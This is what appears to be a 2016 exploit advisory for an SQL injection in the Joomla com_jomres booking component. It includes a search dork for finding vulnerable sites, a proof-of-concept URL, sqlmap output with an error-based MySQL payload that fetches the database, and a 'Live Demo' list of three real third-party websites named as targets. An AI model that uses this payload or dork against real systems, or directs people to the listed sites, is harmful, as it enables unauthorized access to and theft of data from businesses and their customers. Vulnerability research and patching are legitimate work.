######################
# Exploit Title : Joomla com_ jomres SQL injection Vulnerability
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_ jomres "property_uid"
# Software link : https://www.jomres.net/files/jomres_joomla_component_installer.zip
# Vendor Homepage : https://www.jomres.net
# Tested on: [ Kali Linux 2.0 ]
# skype:xbadgirl21
# Date: 2016/07/12
# video Proof : https://youtu.be/BjTHnDZsX_s
######################
# [+] DESCRIPTION :
######################
# [+] Jomres is the most powerful, commission-free Joomla and WordPress online booking system and property management solution
# [+] used by thousands of businesses worldwide
# [+] to better manage their properties, reservations, payments and increase sales
# [+] and an SQL injection been Detected in this Joomla components jomres
######################
# [+] Poc :
######################
# [property_uid] Get Parameter Vulnerable To SQLi
# http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'
######################
# [+] SQLmap Poc :
######################
# http(s)://<host>/<joomla-path>/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82'&tmpl=kiss&lang=ro" -p property_uid --dbs
# Parameter: property_uid (GET)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
# Payload: option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103&property_uid=82' AND (SELECT 8845 FROM(SELECT COUNT(*),CONCAT(0x716a6a6a71,(SELECT #(ELT(8845=8845,1))),0x716a717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- DiLY&tmpl=kiss&lang=ro
# ---
# [15:29:04] [INFO] the back-end DBMS is MySQL
# web application technology: PHP 5.4.45, Apache
# back-end DBMS: MySQL 5.0
# [15:29:04] [INFO] fetching current database
######################
# [+] Live Demo :
######################
# https://turo.ro/index.php?option=com_jomres&Itemid=103&task=ajax_comentarii&Itemid=103%27&property_uid=82%27&tmpl=kiss&lang=ro
# http://www.apartamentosviella.com/index.php?option=com_jomres&Itemid=160&lang=es&task=listProperties&propertylist_layout=mapview
# http://www.andorraski.be/index.php?option=com_jomres&Itemid=140&lang=nl&task=dobooking&selectedProperty=50
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################